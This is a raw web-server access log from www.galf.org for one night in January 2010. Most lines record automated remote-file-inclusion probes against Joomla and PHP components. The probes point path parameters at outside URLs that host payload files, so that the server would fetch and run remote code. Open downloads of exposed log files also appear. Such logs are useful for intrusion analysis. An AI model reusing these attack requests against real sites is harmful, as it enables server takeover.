211.172.225.131 - - [18/Jan/2010:03:03:05 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.172.225.131 - - [18/Jan/2010:03:03:05 -0800] "GET /logs/access_091207.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.172.225.131 - - [18/Jan/2010:03:03:07 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.172.225.131 - - [18/Jan/2010:03:04:55 -0800] "GET /logs/access_090824.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:05:19 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:05:19 -0800] "GET /logs/access_091123.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:05:19 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:05:26 -0800] "GET /logs/access_090720.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:05:35 -0800] "GET /logs/access_091123.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:05:35 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:05:35 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:05:45 -0800] "GET /public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:05:45 -0800] "GET /logs/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:05:45 -0800] "GET /logs/access_091123.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:05:50 -0800] "GET /logs/access_090720.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:05:51 -0800] "GET /logs/access_090720.log%20%20/public/amministrazione/newspublish//include.php?path%5Bdocroot%5D=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:06:47 -0800] "GET /logs/access_091019.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:06:47 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:06:47 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:06:58 -0800] "GET /logs/access_090817.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [18/Jan/2010:03:07:24 -0800] "GET /logs///lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [18/Jan/2010:03:07:24 -0800] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [18/Jan/2010:03:07:24 -0800] "GET /logs/access_090713.log%20%20///lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [18/Jan/2010:03:07:30 -0800] "GET /logs/access_090824.log%20%20///lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.111.176.66 - - [18/Jan/2010:03:07:36 -0800] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.111.176.66 - - [18/Jan/2010:03:07:36 -0800] "GET /logs/access_090713.log///lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.111.176.66 - - [18/Jan/2010:03:07:36 -0800] "GET /logs///lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.111.176.66 - - [18/Jan/2010:03:07:56 -0800] "GET /logs/access_090824.log///lib/adodb_lite/adodb-perf-module.inc.php?last_module=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.207.6.170 - - [18/Jan/2010:03:08:23 -0800] "GET /logs/access_090803.log HTTP/1.0" 200 1572864 "http://www.galf.org/logs/access_090803.log" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
211.172.225.131 - - [18/Jan/2010:03:10:37 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.172.225.131 - - [18/Jan/2010:03:10:37 -0800] "GET /logs/access_091207.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.172.225.131 - - [18/Jan/2010:03:10:38 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:11:23 -0800] "GET /logs/access_100111.log///admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:11:23 -0800] "GET //admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:11:23 -0800] "GET /logs///admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.172.225.131 - - [18/Jan/2010:03:12:28 -0800] "GET /logs/access_090824.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.manpoints.net/ei/11.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:14:20 -0800] "GET /logs///admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:14:20 -0800] "GET //admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:14:21 -0800] "GET /logs/access.log///admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:14:51 -0800] "GET //admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:14:51 -0800] "GET /logs/access.log///admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:14:51 -0800] "GET /logs///admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [18/Jan/2010:03:15:15 -0800] "GET /logs///admin.x-shop.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [18/Jan/2010:03:15:15 -0800] "GET /logs/access.log///admin.x-shop.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [18/Jan/2010:03:15:15 -0800] "GET //admin.x-shop.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:15:44 -0800] "GET /logs/access_091019.log///admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:16:31 -0800] "GET //admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:16:31 -0800] "GET /logs/access.log///admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:16:31 -0800] "GET /logs///admin.x-shop.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:20:52 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [18/Jan/2010:03:21:03 -0800] "GET /logs/access_091019.log///admin.x-shop.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:21:31 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:21:59 -0800] "GET /logs/access_091019.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:22:55 -0800] "GET /logs/access_090817.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [18/Jan/2010:03:23:41 -0800] "GET /logs///admin.x-shop.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [18/Jan/2010:03:23:41 -0800] "GET //admin.x-shop.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.19.247.188 - - [18/Jan/2010:03:23:41 -0800] "GET /logs/access_100111.log///admin.x-shop.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:23:42 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:24:44 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:24:44 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:24:44 -0800] "GET /logs/access_091019.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:24:49 -0800] "GET /logs/access_090817.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:25:00 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:25:00 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:25:00 -0800] "GET /logs/access_091019.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:25:01 -0800] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:25:05 -0800] "GET /logs/ HTTP/1.1" 200 4799 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:25:07 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:25:11 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:03:25:12 -0800] "GET /logs/access_090817.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:26:07 -0800] "GET //administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:26:07 -0800] "GET /logs///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:26:07 -0800] "GET /logs/access_091026.log///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:26:07 -0800] "GET /logs///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:26:07 -0800] "GET //administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:26:07 -0800] "GET /logs/access_091026.log///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:26:40 -0800] "GET /logs/access_091130.log HTTP/1.1" 200 786432 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:26:43 -0800] "GET /logs/access_090727.log HTTP/1.1" 200 786432 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:26:47 -0800] "GET /logs/access_091026.log HTTP/1.1" 200 393216 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:26:51 -0800] "GET /logs/access_091214.log HTTP/1.1" 200 786432 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:26:56 -0800] "GET /logs/access_090720.log HTTP/1.1" 200 786432 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:26:56 -0800] "GET /logs/access_091116.log HTTP/1.1" 200 458752 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:26:58 -0800] "GET /logs/access_090928.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:26:59 -0800] "GET /logs/access_090713.log HTTP/1.1" 200 131072 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:01 -0800] "GET /logs/access_091019.log HTTP/1.1" 200 589824 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:02 -0800] "GET /logs/access_090831.log HTTP/1.1" 200 65536 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:03 -0800] "GET /logs/access_100111.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:05 -0800] "GET /logs/access_090810.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:08 -0800] "GET /logs/access_090907.log HTTP/1.1" 200 65536 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:08 -0800] "GET /logs/access_091012.log HTTP/1.1" 200 589824 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:09 -0800] "GET /logs/access.log HTTP/1.1" 200 468272 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:10 -0800] "GET /logs/access_090824.log HTTP/1.1" 200 131072 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:11 -0800] "GET /logs/access_090921.log HTTP/1.1" 200 262144 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:12 -0800] "GET /logs/scripts.log HTTP/1.1" 200 786432 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:13 -0800] "GET /logs/access_100118.log HTTP/1.1" 200 196608 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:13 -0800] "GET /logs/access_090817.log HTTP/1.1" 200 786432 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:22 -0800] "GET /logs/access_090914.log HTTP/1.1" 200 786432 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:23 -0800] "GET /logs/access_091228.log HTTP/1.1" 200 393216 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:25 -0800] "GET /logs/access_091005.log HTTP/1.1" 200 786432 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:25 -0800] "GET /logs/access_100104.log HTTP/1.1" 200 393216 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:27 -0800] "GET /logs/access_091123.log HTTP/1.1" 200 262144 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
38.100.41.112 - - [18/Jan/2010:03:27:30 -0800] "GET /logs/access_091109.log HTTP/1.1" 200 262144 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:03:28:13 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:03:28:13 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:03:28:13 -0800] "GET /logs/access_090622.log//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:29:06 -0800] "GET /logs/access_090615.log///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:29:27 -0800] "GET /logs/access_090615.log///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:29:51 -0800] "GET //administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:29:51 -0800] "GET /logs/access_091026.log///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:29:51 -0800] "GET /logs///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:30:17 -0800] "GET //administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:30:17 -0800] "GET /logs/access_091026.log///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:30:17 -0800] "GET /logs///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [18/Jan/2010:03:30:22 -0800] "GET /logs/access_091019.log HTTP/1.1" 200 5782815 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:30:37 -0800] "GET /class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:30:37 -0800] "GET /logs//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:30:37 -0800] "GET /logs/access_091116.log%20%20//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:30:39 -0800] "GET /logs/access_100111.log%20%20//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:30:44 -0800] "GET /class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:30:44 -0800] "GET /logs//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:30:44 -0800] "GET /logs/access_091116.log%20%20//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:30:47 -0800] "GET /class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
